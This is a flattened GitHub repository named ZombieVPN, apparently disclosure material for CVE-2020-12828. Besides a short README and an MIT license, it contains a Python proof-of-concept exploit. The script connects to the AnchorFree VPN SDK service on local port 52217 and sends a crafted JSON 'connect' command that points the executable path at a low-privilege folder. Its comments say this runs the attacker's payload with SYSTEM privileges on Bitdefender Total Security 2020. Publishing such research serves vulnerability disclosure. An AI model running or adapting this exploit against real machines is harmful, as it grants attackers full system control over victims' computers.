├── ZombieVPN.pdf ├── ZombieVPN.png ├── CVE-2020-12828.mp4 ├── README.md ├── LICENSE └── CVE-2020-12828.py /ZombieVPN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xsha/ZombieVPN/HEAD/ZombieVPN.pdf -------------------------------------------------------------------------------- /ZombieVPN.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xsha/ZombieVPN/HEAD/ZombieVPN.png -------------------------------------------------------------------------------- /CVE-2020-12828.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xsha/ZombieVPN/HEAD/CVE-2020-12828.mp4 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ZombieVPN 2 | 3 | This repo contains everything you need to know about CVE-2020-12828 4 | 5 | ![ZombieVPN](./ZombieVPN.png "ZombieVPN") 6 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 0xsha 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /CVE-2020-12828.py: -------------------------------------------------------------------------------- 1 | # Thu Jan 2020 2 | # Basic PoC for ZombieVPN (CVE-2020-12828): anchorFree VPN SDK SYSTEM level code execution 3 | # Tested on Bitdefender total security 2020 (1.2.13.81) 4 | # Tested on Windows 7/10 x64 x86 5 | 6 | # me [at] 0xsha.io 7 | 8 | 9 | import socket 10 | import base64 11 | import json 12 | 13 | 14 | HOST = '127.0.0.1' 15 | PORT = 52217 # vpnservice.exe port (remotely guessable) 16 | 17 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | s.settimeout(5) 19 | s.connect((HOST, PORT)) 20 | 21 | 22 | # this will run openvpn.exe (your payload) with SYSTEM account 23 | 24 | payload = r'''{"command" : "connect", 25 | "vpnExecutablePath" : "C:\Users\LowPriv", 26 | "protocol" : "udp", 27 | "ip" : "1.2.3.4", 28 | "port" : "", 29 | "authFilename" : "c21f7755f3b1f134148ab607dbbcea17.txt", 30 | "enableLog" : false}'''.encode(encoding='utf-8') 31 | 32 | 33 | 34 | print ('CVE-2020-12828 - Anchorfree SYSTEM level code execution') 35 | print ('By 0xSha') 36 | print ('Exploiting ...') 37 | 38 | s.sendall(payload) 39 | #print(base64.b64decode(payload)) 40 | data = s.recv(1024) 41 | s.close() 42 | if 'isSuccess' in repr(data): 43 | print ("Your payload executed as SYSTEM !") 44 | else: 45 | print (":( Nope ") 46 | --------------------------------------------------------------------------------